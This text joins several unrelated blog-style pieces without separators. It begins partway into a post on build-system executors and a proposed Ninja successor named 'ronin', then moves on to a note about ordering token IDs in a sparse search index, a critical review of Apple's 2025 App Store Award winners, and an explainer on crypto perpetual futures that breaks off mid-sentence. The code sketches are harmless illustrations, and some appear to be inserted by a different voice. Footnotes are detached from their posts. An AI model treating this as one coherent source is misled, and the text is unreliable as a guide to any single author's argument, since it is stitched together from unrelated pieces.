Queries on the action graph live in the executor; queries on the configuration graph live in the configure script. For example, cargo metadata / cargo tree, bazel query, and cmake --graphviz query the configuration graph; ninja -t inputs and bazel aquery query the action graph. Cargo has no stable way to query the action graph.
Note that “querying the graph” is not a binary yes/no. Ninja's query language is much more restricted than Bazel's. Compare Ninja's syntax for querying “the command line for all C++ files used to build the target //:hello_world”2 with the equivalent Bazel query.
Bazel’s language has graph operators, such as union, intersection, and filtering, that let you build up quite complex predicates. Ninja can only express one predicate at a time, with much more limited filtering—but unlike Bazel, allows you to filter to individual parts of the action, like the command line invocation, without needing a full protobuf parser or trying to do text post-processing.
I would like to see a query language that combines both these strengths: the same nested predicate structure of Bazel queries, but with a new emit() predicate that takes another predicate as an argument for complex output filtering.
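The post doesn't pin down a syntax for this yet, so here is a rough Python sketch of the idea only: every name here (actions, inputs_of, mnemonic, emit) is hypothetical, and the "graph" is a two-entry toy. The point is the shape — nested predicates plus an emit() projection that selects one part of each matching action.

```python
# Toy action graph: each action has an output, its inputs, and a command line.
actions = [
    {"output": "hello_world", "inputs": ["main.cc.o"], "cmdline": "clang++ -o hello_world main.cc.o"},
    {"output": "main.cc.o",   "inputs": ["main.cc"],   "cmdline": "clang++ -c main.cc -o main.cc.o"},
]

def inputs_of(target):          # one level of deps(...) for a named output
    return {i for a in actions if a["output"] == target for i in a["inputs"]}

def mnemonic(suffix):           # crude stand-in for filtering by rule kind
    return lambda a: any(i.endswith(suffix) for i in a["inputs"])

def emit(field, pred):          # project just one field of each matching action
    return [a[field] for a in actions if pred(a)]

# "command lines for all C++ compiles feeding hello_world"
print(emit("cmdline", lambda a: mnemonic(".cc")(a) and a["output"] in inputs_of("hello_world")))
```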
In my previous post, I talked about two main uses for a tracing build system: first, to automatically add dependency edges for you; and second, to verify at runtime that no dependency edges are missing. This especially shines when the action graph has a way to express negative dependencies, because the tracing system sees every attempted file access and can add them to the graph automatically.
I would want my executor to only support linting and hard errors for missing edges. Inferring a full action graph is scary and IMO belongs in a higher-level tool, and adding dependency edges automatically can be done by a tool that wraps the executor and parses the lints.
What's really cool about this linting system is that it allows you to gradually transition to a hermetic build over time, without frontloading all the work to when you switch to the tool.
environment variables
Tracing environment variable access is … hard. Traditionally access goes through the libc getenv function, but it’s also possible to take an envp in a main function, in which case accesses are just memory reads. That means we need to trace memory reads somehow.
On x86 machines, there’s something called PIN that can do this directly in the CPU without needing compile-time instrumentation. On ARM there’s SPE, which is how perf mem works, but I’m not sure whether it can be configured to track 100% of memory accesses. I need to do more research here.
On Linux, this is all abstracted by perf_event_open. I’m not sure if there are equivalent wrappers on Windows and macOS.
One last way to do this is with a SIGSEGV signal handler, but that requires that environment variables are in their own page of memory, and therefore a linker script. This doesn’t work for environment variables specifically, because they aren’t linker symbols in the normal sense; they get injected by the C runtime. In general, injecting linker scripts means we’re modifying the binaries being run and might cause unexpected build or runtime failures.
ronin: a ninja successor
Here I describe more concretely the tool I want to build, which I’ve named ronin. It would read the constrained clojure action graph serialization format (Magma) that I describe in the previous post; perhaps with a way to automatically convert Ninja files to Magma.
interface
Like Ekam, Ronin would have a --watch continuous rebuild mode (but unlike Bazel and Buck2, no background server). Like Shake, it would have runtime tracing, with all of --tracing=never|warn|error options, to allow gradually transitioning to a hermetic build. And it would have bazel-like querying for the action graph, both through CLI arguments with a jq syntax and through a programmatic API.
Finally, it would have pluggable backends for file watching, tracing, stat-ing, progress reporting, and checksums, so that it can take advantage of systems that have more features while still being reasonably fast on systems that don’t. For example, on Windows stats are slow, so it would cache stat info; but on Linux stats are fast so it would just directly make a syscall.
architecture
Like Ninja, Ronin would keep a command log with a history of past versions of the action graph. It would reuse the bipartite graph structure, with one half being files and the other being commands. It would parse depfiles and dyndeps files just after they’re built, while the cache is still hot.
Like n2, ronin would use a single-pass approach to support early cutoff. It would hash an "input manifest" to decide whether to rebuild. Unlike n2, it would store a mapping from that hash back to the original manifest so you can query why a rebuild happened.
Tracing would be built on top of a FUSE file system that tracked file access.3
Unlike other build systems I know, state (such as manifest hashes, content hashes, and removed outputs) would be stored in an SQLite database, not in flat files.
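As a minimal sketch of how the manifest hashing and SQLite-backed state might fit together (my own illustration under assumptions; the table layout and function names are not ronin's design):

```python
# Sketch: hash an "input manifest" to decide whether to rebuild, and keep the
# hash -> manifest mapping in SQLite so "why did this rebuild?" stays answerable.
import hashlib, json, sqlite3

db = sqlite3.connect("build_state.db")
db.execute("CREATE TABLE IF NOT EXISTS manifests (output TEXT PRIMARY KEY, hash TEXT, manifest TEXT)")

def manifest_hash(manifest: dict) -> str:
    # Canonical JSON so identical inputs always hash identically.
    return hashlib.sha256(json.dumps(manifest, sort_keys=True).encode()).hexdigest()

def needs_rebuild(output: str, manifest: dict) -> bool:
    new_hash = manifest_hash(manifest)
    row = db.execute("SELECT hash, manifest FROM manifests WHERE output = ?", (output,)).fetchone()
    if row and row[0] == new_hash:
        return False
    if row:  # explain the rebuild by diffing the old and new manifests
        old = json.loads(row[1])
        changed = {k for k in old.keys() | manifest.keys() if old.get(k) != manifest.get(k)}
        print(f"{output}: rebuilding because {sorted(changed)} changed")
    db.execute("REPLACE INTO manifests VALUES (?, ?, ?)",
               (output, new_hash, json.dumps(manifest, sort_keys=True)))
    db.commit()
    return True
```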
did you just reinvent buck2?
Kinda. Ronin takes a lot of ideas from buck2. It differs in two major ways:
It does not expect to be a top-level build system. It is perfectly happy to read (and encourages) generated files from a higher level configure tool. This allows systems like CMake and Meson to mechanically translate Ninja files into this new format, so builds for existing projects can get nice things.
It allows you to gradually transition from non-hermetic to hermetic builds, without forcing you to fix all your rules at once, and with tracing to help you find where you need to make your fixes. Buck2 doesn’t support tracing at all. It technically supports non-hermetic builds, but you don't get many benefits compared to using a different build system, and it's still high cost to switch build systems.4
The main advantage of Ronin is that it can slot in underneath existing build systems people are already using—CMake and Meson—without needing changes to your build files at all.
summary
In this post I describe what a build executor does, some features I would like to see from an executor (with a special focus on tracing), and a design for a new executor called ronin that allows existing projects generating ninja files to gradually transition to hermetic builds over time, without a “flag day” that requires rewriting the whole build system.
I don’t know yet if I will actually build this tool; that seems like a lot of work5 😄 but it’s something I would like to exist in the world.
In many ways Conan profiles are analogous to ninja files: profiles are the interface between Conan and CMake in the same way that ninja files are the interface between CMake and Ninja. Conan is the only tool I'm aware of where the split between the package manager and the configure step is explicit. ↩
This is not an apples-to-apples comparison; ideally we would name the target by the output file, not by its alias. Unfortunately output names are unpredictable and quite long in Bazel. ↩
macOS does not have native support for FUSE. MacFuse exists but does not support getting the PID of the calling process. A possible workaround would be to start a new FUSE server for each spawned process group. FUSE on Windows is possible through winfsp. ↩
An earlier version of this post read "Buck2 only supports non-hermetic builds for system toolchains, not anything else", which is not correct. ↩
what if i simply took buck2 and hacked it to bits,,, ↩
I have a search index that stores, for each of a bunch of documents, the set of tokens that occur in that document. I encode that as a sparse bit vector, where each token has an ID and the bit at that index in the bit vector indicates whether that token is present in the document. Since most tokens do not occur in most documents, these vectors are sparse (most of the bits are zeros).
Since the vectors are sparse I can save a lot of space by not storing all the zero bits. The simplest way to do this is with different flavors of run-length encoding, but in order to make intersection and subset tests fast I actually use a representation that's more like the nodes in an array-mapped tree; there's a bitmask with one bit per 64-bit word of the bit vector indicating whether that word contains any nonzero bits, and we only store the 64-bit words that aren't zero.
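A minimal Python sketch of that mask-plus-nonzero-words encoding (my own illustration of the idea, not the actual index code), including the word-wise intersection it makes cheap:

```python
# Encode a bit vector (given as a list of 64-bit words) as a presence mask
# plus only the nonzero words.
def encode(words: list[int]) -> tuple[int, list[int]]:
    mask, nonzero = 0, []
    for i, w in enumerate(words):
        if w:
            mask |= 1 << i
            nonzero.append(w)
    return mask, nonzero

def intersect(a: tuple[int, list[int]], b: tuple[int, list[int]]) -> tuple[int, list[int]]:
    # Only word positions present in both masks can contribute to the result.
    mask_a, words_a = a
    mask_b, words_b = b
    out_mask, out_words = 0, []
    ia = ib = 0
    for i in range(max(mask_a.bit_length(), mask_b.bit_length())):
        in_a = (mask_a >> i) & 1
        in_b = (mask_b >> i) & 1
        if in_a and in_b:
            w = words_a[ia] & words_b[ib]
            if w:
                out_mask |= 1 << i
                out_words.append(w)
        ia += in_a
        ib += in_b
    return out_mask, out_words
```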
Either way, whether we're using RLE or our mask encoding, the longer our contiguous runs of zeros are, the less data we have to store. While we don't get to pick what tokens occur in which documents, we do get to pick which tokens are next to each other in the vector; ie we're free to choose whatever token IDs we want. We want to choose token ids such that the one bits are all clumped together.
Another way to say we want one bits clumped together is to say we want to maximize the probability that a particular bit is a one given that its neighbors are ones, and maximize the probability that a bit is a zero if its neighbors are zeros.
We can calculate those probabilities by generating a co-occurrence matrix. That's a symmetric matrix whose rows and columns are tokens, and where the value at a,b is the number of times a and b occur in the same document.
Now we want to choose an ordering of the rows where rows that co-occur more end up closer together. We do that by finding the eigenvector of the matrix with the largest eigenvalue, multiplying by that vector (which gives us a single column vector), and then sorting by the values of that column vector. This is basically doing PCA down to 1D.
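A rough numpy sketch of that reordering step (all names here are mine; note that sorting directly by the top eigenvector is equivalent to sorting by the matrix-vector product, since that product is just the eigenvector scaled by its eigenvalue):

```python
import numpy as np

def reorder_tokens(docs: list[set[int]], n_tokens: int) -> list[int]:
    # Co-occurrence matrix: entry [a, b] counts documents containing both tokens.
    cooc = np.zeros((n_tokens, n_tokens))
    for doc in docs:
        for a in doc:
            for b in doc:
                cooc[a, b] += 1
    # eigh works because the matrix is symmetric; the last column corresponds
    # to the largest eigenvalue.
    _, vecs = np.linalg.eigh(cooc)
    top = vecs[:, -1]
    # New ordering: old token ids sorted by their position along that eigenvector.
    return sorted(range(n_tokens), key=lambda t: top[t])
```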
This works in practice, and gives me an overall 12% improvement in index size over choosing token ids at random.
★ 2025 App Store Award Winners: Tiimo, Essayist, and Detail
This year’s winners represent the best-in-class apps and games
we returned to again and again. We hope you enjoy them as much
as we do.
I did not enjoy all of them as much as Apple did.
Tiimo
iPhone app of the year
Tiimo bills itself as an “AI Planner & To-do” app that is designed with accommodations for people with ADHD and other neurodivergences. Subscription plans cost $12/month ($144/year) or $54/year ($4.50/month). It does not offer a native Mac app, and at the end of onboarding/account setup, it suggests their web app for use on desktop computers. When I went to the web app, after signing in with the “Sign in With Apple” account I created on the iPhone app, Tiimo prompted me to sign up for an annual subscription for $42/year ($3.50/month), or monthly for $10 ($120/year). The in-app subscriptions offer a 30-day free trial; the less expensive pay-on-the-web subscriptions only offer a 7-day free trial. The web app doesn’t let you do anything without a paid account (or at least starting a trial); the iOS app offers quite a bit of basic functionality free of charge.
Built to support people who are neurodivergent (and anyone
distracted by the hum of modern life), Tiimo brought clarity to our
busy schedules using color-coded, emoji-accented blocks. The
calming visual approach made even the most hectic days feel
manageable.
It starts by syncing everything in Calendar and Reminders, pulling
in doctor’s appointments, team meetings, and crucial prompts to
walk the dog or stand up and stretch. Instead of dumping it all
into a jumbled list, the app gives each item meaning by
automatically assigning it a color and an emoji. (Tiimo gave us the
option to change the weightlifter emoji it added to our workout
reminders, but its pick was spot on.)
While on the move with coffee in one hand and keys in the other,
we sometimes talked to Tiimo with the AI chatbot feature to add new
tasks or shift appointments. When we felt overwhelmed by our to-do
list, Tiimo kept us laser-focused by bubbling up just high-priority
tasks, while its built-in Focus timer (accessible from any to-do
with a tap) saved us from the pitfalls of multitasking.
But Tiimo really stood out when we faced a big personal project,
like getting our Halloween decorations up before Thanksgiving.
With the help of AI, the app suggested all the smaller tasks
that would get us there: gathering the decorations from the
garage, planning the layout, securing the cobwebs, and doing a
safety check.
Aside from the web app, Tiimo is iOS exclusive, with apps only for iPhone, iPad, and Apple Watch. No Android version. It seems to do a good job with native platform integration (Calendar integration is free; Reminders integration requires a subscription). Animations in the app feel slow to me, which makes the app itself feel slow. And, personally, I find Tiimo’s emphasis on decorating everything with emoji distracting and childish, not clarifying.
The app seems OK, but not award-worthy to me. But, admittedly, I’m not in the target audience for Tiimo’s ADHD/neurodivergent focus. I don’t need reminders to have coffee in the morning, start work, have dinner, or to watch TV at night, which are all things Tiimo prefilled on my Today schedule after I went through onboarding. As I write this sentence, I’ve been using Tiimo for five minutes, and it’s already prompted me twice to rate it on the App Store. Nope, wait, I just got a third prompt. That’s thirsty, and a little gross. (And, although I’m not an ADHD expert, three prompts to rate and review the app in the first 10 minutes of use strikes me as contrary to the needs of the easily distracted.)
Essayist
Mac app of the year
Essayist bills itself as “The Word Processor designed for Academic Writing” (capitalization verbatim). Subscriptions cost $80/year ($6.67/month) or $10/month ($120/year). Its raison d’être is managing citations and references, and automatically formatting the entire document, including citations, according to a variety of standards (MLA, Chicago, etc.). Quoting from Apple’s own description of Essayist:
Essayist gives you an easy way to organize a dizzying array of
primary sources. Ebooks, podcasts, presentations, and even direct
messages and emails can be cataloged with academic rigor. Using
macOS Foundation Models, Essayist extracts all the key info needed
to use it as a source.
For example, paste a YouTube URL into an entry and Essayist
automatically fills in the name of the video, its publication
date, and the date you accessed it. Drag in an article as a PDF to
have Essayist fill in the title, author, and more — and store the
PDF for easy access. You can also search for the books and journal
articles you’re citing right in the app.
Essayist is a document-based (as opposed to library-based) app, and its custom file format is a package with the adorable file extension “.essay”. The default font for documents is Times New Roman, and the only other option is, of all fonts, Arial — and you need an active subscription to switch the font to Arial. (Paying money for the privilege to use Arial... Jiminy fucking christ. I might need a drink.) I appreciate the simplicity of severely limiting font choices to focus the user’s attention on the writing, but offering Times New Roman and Arial as the only options means you’re left with the choice between “the default font’s default font” and “font crime”. The Essayist app itself has no Settings; instead, it offers only per-document settings.
The app carries a few whiffs of non-Mac-likeness (e.g. the aforementioned lack of Settings, and some lame-looking custom alerts). The document settings window refers to a new document, even after it has been saved with a name, as “Untitled” until you close and reopen the document. Reopened documents do not remember their window size and position. But poking around with otool, it appears to be written using AppKit, not Catalyst. I suspected the app might be Catalyst because there are companion iOS apps for iPhone and iPad, which seem to offer identical feature sets as the Mac app. Essayist uses a clever system where, unless you have a subscription, documents can only be edited on the device on which they were created, but you can open them read-only on other devices. That feels like a good way to encourage paying while giving you a generous way to evaluate Essayist free of charge. There is no Android, Windows, or web app version — it’s exclusive to Mac and iOS.
I’ve never needed to worry about adhering to a specific format for academic papers, and that’s the one and only reason I can see to use Essayist. In all other aspects, it seems a serviceable but very basic, almost primitive, word processor. There’s no support for embedding images or figures of any kind in a document, for example.
Detail
iPad app of the year
Detail bills itself, simply and to the point, as an “AI Video Editor”. The default subscription is $70/year ($5.83/month) with a 3-day free trial; the other option is to pay $12/month ($144/year) with no free trial. After a quick test drive, Detail seems like an excellent video editing app, optimized for creating formats common on social media, like reel-style vertical videos where you, the creator, appear as a cutout in the corner, in front of the video or images that you’re talking about. The iPhone version seems equally good. The iPad version of Detail will install and run on MacOS, but it’s one of those “Designed for iPad / Not verified for macOS” direct conversions. But they do offer a standalone Mac app, Detail Studio, which is a real Mac app, written using AppKit, which requires a separate subscription to unlock pro features ($150/year or $22/month). Detail only offers apps for iOS and MacOS — no Windows, Android, or web.
When we used Detail to record a conversation of two people sitting
side by side, the app automatically created a cut that looked like
it was captured with two cameras. It zoomed in on one speaker,
then cut away to the other person’s reaction. The app also made it
easy to unleash our inner influencer. We typed a few key points,
and the app’s AI wrote a playful script that it loaded into its
teleprompter so we could read straight to the camera.
Most importantly, Detail helped us memorialize significant life
moments all while staying present. At a birthday party, we propped
an iPad on a table and used Detail to record with the front and
back cameras simultaneously. The result was a split-screen video
with everyone singing “Happy Birthday” on the left and the guest
of honor blowing out the candles on the right. (No designated
cameraperson needed.)
Detail has a bunch of seemingly genuinely useful AI-based features. But putting all AI features aside, it feels like a thoughtful, richly featured manual video editor. I suspect that’s why the AI features might work well — they’re an ease-of-use / automation layer atop a professional-quality non-AI foundation. Basically, Detail seems like what Apple’s own Clips — recently end-of-life’d — should have been. It turns your iPad (or iPhone) into a self-contained video studio. Cool.
Of these three apps — Tiimo on iPhone, Essayist on Mac, and Detail on iPad — Detail appeals to me the most, and strikes me as the most deserving of this award. If I were to start making videos for modern social media, I’d strongly evaluate Detail as my primary tool.
Apple still has no standalone category for AI apps, but all three of these apps emphasize AI features, and Apple itself calls out those AI features in its praise for them. It’s an obvious recurring theme shared by all three, along with their shared monetization strategies of being free to download with in-app subscriptions to unlock all features, and the fact that all three winners are exclusive to iOS and Mac (and, in Tiimo’s case, the web).
Programming note: Bits about Money is supported by our readers. I generally forecast about one issue a month, and haven’t kept that pace this year. As a result, I’m working on about 3-4 for December.
Much financial innovation is in the ultimate service of the real economy. Then, we have our friends in crypto, who occasionally do intellectually interesting things which do not have a locus in the real economy. One of those things is perpetual futures (hereafter, perps), which I find fascinating and worthy of study, the same way that a virologist just loves geeking out about furin cleavage sites.
You may have read a lot about stablecoins recently. I may write about them (again; see past BAM issue) in the future, as there has in recent years been some uptake of them for payments. But it is useful to understand that a plurality of stablecoins collateralize perps. Some observers are occasionally strategic in whether they acknowledge this, but for payments use cases, it does not require a lot of stock to facilitate massive flows. And so of the $300 billion or so in stablecoins presently outstanding, about a quarter sit on exchanges. The majority of that is collateralizing perp positions.
Perps are the dominant way crypto trades, in terms of volume. (It bounces around but is typically 6-8 times larger than spot.) This is similar to most traditional markets: where derivatives are available, derivative volume swamps spot volume. The degree to which depends on the market, Schelling points, user culture, and similar. For example, in India, most retail investing in equity is actually through derivatives; this is not true of the U.S. In the U.S., most retail equity exposure is through the spot market, directly holding stocks or indirectly through ETFs or mutual funds. Most trading volume of the stock indexes, however, is via derivatives.
Beginning with the problem
The large crypto exchanges are primarily casinos, who use the crypto markets as a source of numbers, in the same way a traditional casino might use a roulette wheel or set of dice. The function of a casino is for a patron to enter it with money and, statistically speaking, exit it with less. Physical casinos are often huge capital investments with large ongoing costs, including the return on that speculative capital. If they could choose to be less capital intensive, they would do so, but they are partially constrained by market forces and partially by regulation.
A crypto exchange is also capital intensive, not because the website or API took much investment (relatively low, by the standards of financial software) and not because they have a physical plant, but because trust is expensive. Bettors, and the more sophisticated market makers, who are the primary source of action for bettors, need to trust that the casino will actually be able to pay out winnings. That means the casino needs to keep assets (generally, mostly crypto, but including a smattering of cash for those casinos which are anomalously well-regarded by the financial industry) on hand exceeding customer account balances.
Those assets are… sitting there, doing nothing productive. And there is an implicit cost of capital associated with them, whether nominal (and borne by a gambler) or material (and borne by a sophisticated market making firm, crypto exchange, or the crypto exchange’s affiliate which trades against customers [0]).
Perpetual futures exist to provide the risk gamblers seek while decreasing the total capital requirement (shared by the exchange and market makers) to profitably run the enterprise.
Perps predate crypto but found a home there
In the commodities futures markets, you can contract to either buy or sell some standardized, valuable thing at a defined time in the future. The overwhelming majority of contracts do not result in taking delivery; they’re cancelled by an offsetting contract before that specified date.
Given that speculation and hedging are such core use cases for futures, the financial industry introduced a refinement: cash-settled futures. Now there is a reference price for the valuable thing, with a great deal of intellectual effort put into making that reference price robust and fair (not always successfully). Instead of someone notionally taking physical delivery of pork bellies or barrels of oil, people who are net short the future pay people who are net long the future on delivery day. (The mechanisms of this clearing are fascinating but outside today’s scope.)
Back in the early nineties economist Robert Shiller proposed a refinement to cash-settled futures: if you don’t actually want pork bellies or oil barrels for consumption in April, and we accept that almost no futures participants actually do, why bother closing out the contracts in April? Why fragment the liquidity for contracts between April, May, June, etc.? Just keep the market going perpetually.
This achieved its first widespread popular use in crypto (Bitmex is generally credited as being the popularizer), and hereafter we’ll describe the standard crypto implementation. There are, of course, variations available.
Multiple settlements a day
Instead of all of a particular futures vintage settling on the same day, perps settle multiple times a day for a particular market on a particular exchange. The mechanism for this is the funding rate. At a high level: winners get paid by losers every e.g. 4 hours and then the game continues, unless you’ve been blown out due to becoming overleveraged or for other reasons (discussed in a moment).
Consider a toy example: a retail user buys 0.1 Bitcoin via a perp. The price on their screen, which they understand to be for Bitcoin, might be $86,000 each, and so they might pay $8,600 cash. Should the price rise to $90,000 before the next settlement, they will get +/- $400 of winnings credited to their account, and their account will continue to reflect exposure to 0.1 units of Bitcoin via the perp. They might choose to sell their future at this point (or any other). They’ll have paid one commission (and a spread) to buy, one (of each) to sell, and perhaps they’ll leave the casino with their winnings, or perhaps they’ll play another game.
Where did the money come from? Someone else was symmetrically short exposure to Bitcoin via a perp. It is, with some very important caveats incoming, a closed system: since no good or service is being produced except the speculation, winning money means someone else lost.
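Spelling out the toy example's arithmetic (a sketch only; real exchanges layer fees, funding payments, and mark-price conventions on top of this):

```python
# P&L on the toy perp position above, and the symmetric loss on the other side.
position_btc = 0.1
entry_price  = 86_000
mark_price   = 90_000

long_pnl  = position_btc * (mark_price - entry_price)   # +$400 credited to the long
short_pnl = -long_pnl                                    # the offsetting short pays it
print(long_pnl, short_pnl)  # 400.0 -400.0
```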
One fun wrinkle for funding rates: some exchanges cap the amount the rate can be for a single settlement period. This is similar in intent to traditional markets’ usage of circuit breakers: designed to automatically blunt out-of-control feedback loops. It is dissimilar in that it cannot actually break circuits: changes to the funding rate can delay realization of losses but can’t prevent them, since they don’t prevent the realization of symmetrical gains.
Perp funding rates also embed an interest rate component. This might get quoted as 3 bps a day, or 1 bps every eight hours, or similar. However, because of the impact of leverage, gamblers are paying more than you might expect: at 10X leverage that’s 30 bps a day. Consumer finance legislation standardizes borrowing costs as APR rather than basis points per day so that an unscrupulous lender can’t bury a 200% APR in the fine print.
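A quick back-of-the-envelope check of that leverage math (my arithmetic, not any exchange's published rate):

```python
# 3 bps/day charged on notional is 30 bps/day on the gambler's own equity at 10x.
daily_rate_on_notional = 0.0003          # 3 bps per day
leverage = 10
daily_rate_on_equity = daily_rate_on_notional * leverage   # 0.003 = 30 bps/day

simple_apr     = daily_rate_on_equity * 365                # ~110% per year, uncompounded
compounded_apr = (1 + daily_rate_on_equity) ** 365 - 1     # ~198% per year, compounded daily
print(f"{simple_apr:.0%} simple, {compounded_apr:.0%} compounded")
```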
Convergence in prices via the basis trade
Prices for perps do not, as a fact of nature, exactly match the underlying. That is a feature for some users.
In general, when the market is exuberant, the perp will trade above spot (the underlying market). To close the gap, a sophisticated market participant should do the basis trade: make offsetting trades in perps and spot (short the perp and buy spot, here, in equal size). Because the funding rate is set against a reference price for the underlying, longs will be paying shorts more (as a percentage of the perp’s current market price). For some of them, that’s fine: the price of gambling went up, oh well. For others, that’s a market incentive to close out the long position, which involves selling it, which will decrease the price at the margin (in the direction of spot).
The market maker can wait for price convergence; if it happens, they can close the trade at a profit, while having been paid to maintain the trade. If the perp continues to trade rich, they can just keep collecting the elevated funding payments. To the extent these are higher than their own cost of capital, this can be extremely lucrative.
Flip the polarities of these to understand the other direction.
The basis trade, classically executed, is delta neutral: one isn’t exposed to the underlying itself. You don’t need any belief in Bitcoin’s future adoption story, fundamentals, market sentiment, halvings, none of that. You’re getting paid to provide the gambling environment, including a really important feature: the perp price needs to stay reasonably close to the spot price, close enough to continue attracting people who want to gamble. You are also renting access to your capital for leverage.
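A small sketch of why the classic basis trade is delta neutral, with illustrative numbers only (it assumes the perp converges to spot at exit, and ignores fees, slippage, and collateral haircuts):

```python
# Short the perp (trading rich) and buy spot in equal size; directional moves cancel.
size    = 1.0        # BTC
spot_in = 86_000     # buy spot here
perp_in = 86_500     # short the perp here

def pnl(spot_out: float, perp_out: float, funding_received: float) -> float:
    long_spot  = size * (spot_out - spot_in)
    short_perp = size * (perp_in - perp_out)
    return long_spot + short_perp + funding_received

# Whatever the market does, the legs offset; what's left is the basis captured
# at entry plus whatever funding the short collected along the way.
print(pnl(spot_out=80_000, perp_out=80_000, funding_received=300))  # 800.0
print(pnl(spot_out=95_000, perp_out=95_000, funding_received=300))  # 800.0
```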
You are also underwriting the exchange: if they blow up, your collateral becoming a claim against the bankruptcy estate is the happy scenario. (As one motivating example: Galois Capital, a crypto hedge fund doing basis trades, had ~40% of its assets on FTX when it went down. They then wound down the fund, selling the bankruptcy claim for 16 cents on the dollar.)
Recall that the market can’t function without a system of trust saying that someone is good for it if a bettor wins. Here, the market maker is good for it, via the collateral it kept on the exchange.
Many market makers function across many different crypto exchanges. This is one reason they’re so interested in capital efficiency: fully collateralizing all potential positions they could take across the universe of venues they trade on would be prohibitively capital intensive, and if they do not pre-deploy capital, they miss profitable trading opportunities. [1]
Leverage and liquidations
Gamblers like risk; it amps up the fun. Since one has many casinos to choose from in crypto, the ones which offer only “regular” exposure to Bitcoin (via spot or perps) would be offering a less-fun product for many users than the ones which offer leverage. How much leverage? More leverage is always the answer to that question, until predictable consequences start happening.
In a standard U.S. brokerage account, Regulation T has, for almost 100 years now, set maximum leverage limits (by setting minimums for margins). These are 2X at position opening time and 4X “maintenance” (before one closes out the position). Your brokerage would be obligated to forcibly close your position if volatility causes you to exceed those limits.
As a simplified example, if you have $50k of cash, you’d be allowed to buy $100k of stock. You now have $50k of equity and a $50k loan: 2x leverage. Should the value of that stock decline to about $67k, you still owe the $50k loan, and so only have $17k remaining equity. You’re now on the precipice of being 4X leveraged, and should expect a margin call very soon, if your broker hasn’t “blown you out of the trade” already.
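The arithmetic behind that example, written out (simplified: no interest, fees, or maintenance-margin nuances):

```python
cash  = 50_000
stock = 100_000          # bought with a $50k margin loan on top of the cash
loan  = stock - cash

stock_now = 67_000
equity    = stock_now - loan            # $17,000 of equity left after the decline
leverage  = stock_now / equity          # ~3.9x, right at the 4x maintenance line
print(equity, round(leverage, 1))       # 17000 3.9
```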
What part of that is relevant to crypto? For the moment, just focus on that number: 4X.
Perps are offered at 1X (non-levered exposure). But they’re routinely offered at 20X, 50X, and 100X. SBF, during his press tour / regulatory blitz about being a responsible financial magnate fleecing the customers in an orderly fashion, voluntarily self-limited FTX to 20X.
One reason perps are structurally better for exchanges and market makers is that they simplify the business of blowing out leveraged traders. The exact mechanics depend on the exchange, the amount, etc, but generally speaking you can either force the customer to enter a closing trade or you can assign their position to someone willing to bear the risk in return for a discount.
Blowing out losing traders is lucrative for exchanges except when it catastrophically isn’t. It is a priced service in many places. The price is quoted to be low (
“a nominal fee of 0.5%
” is one way Binance describes it) but, since it is calculated from the amount at risk, it can be a large portion of the money lost. If the account’s negative balance is less than the liquidation fee, wonderful, thanks for playing and the exchange / “the insurance fund” keeps the rest, as a tip.
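To see how a fee quoted on the position size can consume most of a levered trader’s margin, a rough sketch with invented numbers:
// A "nominal" liquidation fee is charged on the notional position, not on the trader's margin.
const margin = 1_000;               // the trader's collateral
const leverage = 100;               // a 100X perp position
const notional = margin * leverage; // $100,000 of exposure
const liquidationFeeRate = 0.005;   // "a nominal fee of 0.5%"

const fee = notional * liquidationFeeRate;
console.log(fee);          // 500
console.log(fee / margin); // 0.5: half of everything the trader put up, before any trading losses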
In the case where the amount an account is negative by is more than the fee, that “insurance fund” can choose to pay the winners on behalf of the liquidated user, at management’s discretion. Management will
usually
decide to do this, because a casino with a reputation for not paying winners will not long remain a casino.
But tail risk is a real thing. The capital efficiency
has a price
: there physically does not exist enough money in the system to pay all winners given sufficiently dramatic price moves. Forced liquidations happen. Sophisticated participants withdraw liquidity (for reasons we’ll soon discuss) or the exchange becomes overwhelmed technically / operationally. The forced liquidations eat through the diminished / unreplenished liquidity in the book, and the magnitude of the move increases.
Then crypto
gets reminded
about automatic deleveraging (ADL), a detail of perp contracts that few participants understand.
We have altered the terms of your unregulated futures investment contract.
Risk in perps has to be symmetric: if (accounting for leverage) there are 100,000 units of Somecoin exposure long, then there are 100,000 units of Somecoin exposure short. This does not imply that the shorts or longs are sufficiently capitalized to
actually pay
for all the exposure in all instances.
In cases where management deems paying winners from the insurance fund would be too costly and/or impossible, they automatically deleverage some winners. In theory, there is a published process for doing this, because it would be confidence-costing to ADL non-affiliated accounts but pay out affiliated accounts, one’s friends or particularly important counterparties, etc. In theory.
In theory, one likely ADLs accounts which were quite levered before ones which were less levered, and one ADLs accounts which had high profits before ones with lower profits. In theory. [2]
So perhaps you understood, prior to a 20% move, that you were 4X leveraged. You just earned 80%, right? Ah, except you were only 2X leveraged, so you earned 40%. Why were you
retroactively
only 2X? That’s what automatic deleveraging means. Why couldn’t you get the other 40% you feel entitled to? Because the collective group of losers doesn’t have enough to pay you your winnings and the insurance fund was insufficient or deemed insufficient by management.
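The arithmetic of that unpleasant surprise, with illustrative numbers:
// You believed you were 4X levered into a 20% favorable move...
const priceMove = 0.20;
const believedLeverage = 4;
console.log(believedLeverage * priceMove); // 0.8: the 80% return you thought you had earned

// ...but ADL retroactively cut your position in half, so you were only 2X levered.
const actualLeverage = 2;
console.log(actualLeverage * priceMove);   // 0.4: the 40% you actually receive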
ADL is particularly painful for sophisticated market participants doing e.g. a basis trade, because they thought e.g. they were 100 units short via perps and 100 units long
somewhere else
via spot. If it turns out they were actually 50 units short via perps, but 100 units long, their net exposure is +50 units, and they have very possibly just gotten absolutely shellacked.
In theory, this can happen to the upside or the downside.
In practice
in crypto, this seems to usually happen after sharp decreases in prices, not sharp increases. For example, October 2025 saw widespread ADLing as (more than)
$19 billion of liquidations
happened, across a variety of assets. Alameda’s CEO Caroline Ellison
testified
that they lost over $100 million during the collapse of Terra’s stablecoin in 2022, because FTX’s insurance fund
was made up
: when leveraged traders lost money, their positions were frequently taken up by Alameda. That was quite lucrative much of the time, but catastrophically expensive during e.g. the Terra blowup. Alameda was a good loser and paid the winners, though: with other customers’ assets that they “borrowed.”
An aside about liquidations
In the traditional markets, if one’s brokerage deems one’s assets are unlikely to be able to cover the margin loan from the brokerage one has used, one’s brokerage will issue a margin call. Historically that gave one a relatively short period (typically, a few days) to post additional collateral, either by moving in cash, by transferring assets from another brokerage, or by experiencing appreciation in the value of one’s assets. Brokerages have the option, and in some cases the requirement, to manage risk after or during a margin call by forcing trades on behalf of the customer to close positions.
It sometimes surprises crypto natives that, in the case where one’s brokerage account goes negative and all assets are sold, with a negative remaining balance, the traditional markets largely
still expect you to pay that balance
